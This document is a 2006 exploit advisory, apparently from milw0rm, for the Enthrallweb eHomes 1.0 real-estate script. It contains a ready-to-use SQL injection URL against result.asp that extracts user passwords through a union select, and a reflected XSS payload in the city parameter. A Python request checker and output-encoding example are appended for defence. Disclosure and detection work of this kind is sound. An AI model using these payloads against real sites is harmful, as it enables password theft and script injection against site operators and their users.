*******************************************************************************
# Title : Enthrallweb eHomes 1.0 Multiple (SQL/XSS) Vulnerabilities
# Author : ajann
# Contact : :(
# S.Page : http://www.enthrallweb.us
# $ : 179.40 USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat=&aminprice=[SQL]

Example:

//result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat=&aminprice=0%20union%20select%20U_Password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

[[XSS]]]---------------------------------------------------------

http://[target]/[path]//result.asp?city=[XSS]

Example:

//result.asp?city=%22%3E%3Cscript%3Ealert%28%27x%27%29%3B%3C%2Fscript%3E+

[[/XSS]]


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-23]
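
Added example, not part of the original advisory and not vendor code: a defensive check for the two result.asp inputs named above. It flags requests whose numeric fields carry anything but digits and whose text fields carry HTML metacharacters, and shows the output encoding that keeps a reflected value inert. Treating aminprice, amaxprice and abedrooms as integer-only is an assumption drawn from their names; the sample requests are constructed.

```python
import html
import re
from urllib.parse import parse_qs

# Parameter names are taken from the advisory's result.asp URLs.
# Assumption: these three are meant to hold integers only.
NUMERIC_PARAMS = ("aminprice", "amaxprice", "abedrooms")
TEXT_PARAMS = ("city", "State", "cat")
HTML_META = re.compile(r"[<>\"']")


def inspect_request(url):
    """Return a list of (param, reason) findings for one result.asp request."""
    # Split by hand: urlsplit() would read a leading "//result.asp" as a host.
    path, _, raw_query = url.partition("?")
    if not path.lower().endswith("result.asp"):
        return []
    # parse_qs percent-decodes values and turns "+" into a space.
    query = parse_qs(raw_query, keep_blank_values=True)
    findings = []
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            # Empty is allowed (the search form leaves fields blank).
            if value and not re.fullmatch(r"\d{1,9}", value):
                findings.append((name, "non-numeric value in numeric field"))
    for name in TEXT_PARAMS:
        for value in query.get(name, []):
            if HTML_META.search(value):
                findings.append((name, "HTML metacharacter in text field"))
    return findings


def render_city(value):
    """Encode a text parameter before it is echoed into the HTML response."""
    return html.escape(value, quote=True)


# Constructed sample requests (the second is a shortened form of the pattern above).
SAMPLES = [
    "/result.asp?city=Austin&State=TX&amaxprice=10000000&abedrooms=3&cat=&aminprice=0",
    "//result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat="
    "&aminprice=0%20union%20select%20U_Password,0%20from%20users",
    "//result.asp?city=%22%3E%3Cscript%3Ealert%28%27x%27%29%3B%3C%2Fscript%3E+",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(sample) or "clean", "<-", sample)
```

The same digit-only rule belongs in the application itself, before the value reaches the SQL statement; the log check only tells you who has been probing.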